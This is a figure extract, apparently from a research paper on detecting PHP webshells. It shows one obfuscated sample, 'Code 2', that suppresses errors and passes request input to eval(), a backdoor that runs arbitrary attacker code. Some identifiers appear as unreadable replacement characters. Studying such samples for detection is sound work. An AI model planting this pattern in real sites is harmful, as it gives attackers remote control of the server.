Webshell Detection Based on Executable Data Characteristics of PHP Code

<table class="algorithm-group"><tr><td><table class="algorithm" id="code2"><tr><td colspan="2"><i>&lt;?php</i></td></tr><tr><td colspan="2">error_reporting(<b>E_ALL</b>ˆE_NOTICE);</td></tr><tr><td colspan="2">define(‘%uFFFD%uFFFD’,’%uFFFD%uFFFD%uF</td></tr><tr><td colspan="2">FFD’);</td></tr><tr><td colspan="2">$_SERVER[%uFFFD%uFFFD]=explode(‘|-|; |(</td></tr><tr><td colspan="2">‘,“password”);</td></tr><tr><td colspan="2"><b>eval</b>($_REQUEST[$_SERVER{%uFFFD%uFFFD}[</td></tr><tr><td colspan="2">0]])</td></tr><tr><td colspan="2"><i>?&gt;</i></td></tr></table></td></tr></table>

Wireless Communications and Mobile Computing

code2

Code 2

Code 2: Webshell Detection Based on Executable Data Characteristics of PHP Code 